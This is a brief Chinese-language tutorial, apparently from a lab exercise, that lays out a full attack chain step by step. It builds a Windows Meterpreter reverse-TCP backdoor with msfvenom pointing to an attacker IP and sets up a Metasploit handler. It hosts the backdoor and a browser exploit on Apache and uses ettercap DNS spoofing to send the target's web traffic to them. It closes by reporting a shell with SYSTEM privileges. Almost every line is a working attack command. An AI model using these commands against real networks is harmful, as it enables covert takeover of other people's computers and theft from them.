1、生成后门:msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.146.142 LPORT=6666 -f exe -o /sss.exe
2、启动msf,选择exp:use exploit/multi/handler
3、设置负荷:set payload windows/meterpreter/reverse_tcp show options 查看需要设置的参数
4、set LHOST设置IP
5、set LPORT设置监听端口
6、再show options看一下参数是否设置正确
7、然后执行exploit
8、Msf里面设置完成过后我们设置dns劫持,把之前生成的后门放到/var/www/目录下面,然后打开K8 生成EXP
9、再把EXP复制到/var/www/目录下面
10、重启apache: service apache2 restart
11、修改ettercap DNS劫持插件的参数:leafpad /etc/ettercap/etter.dns
12、然后执行以下命令启动DNS劫持 DNS劫持:ettercap -T -q -i xxxx -P dns_spoof // //
13、靶机打开IE浏览器*.com的所以网站全部被劫持
14、回到msf查看是否上线
已经上线,并且是system权限
|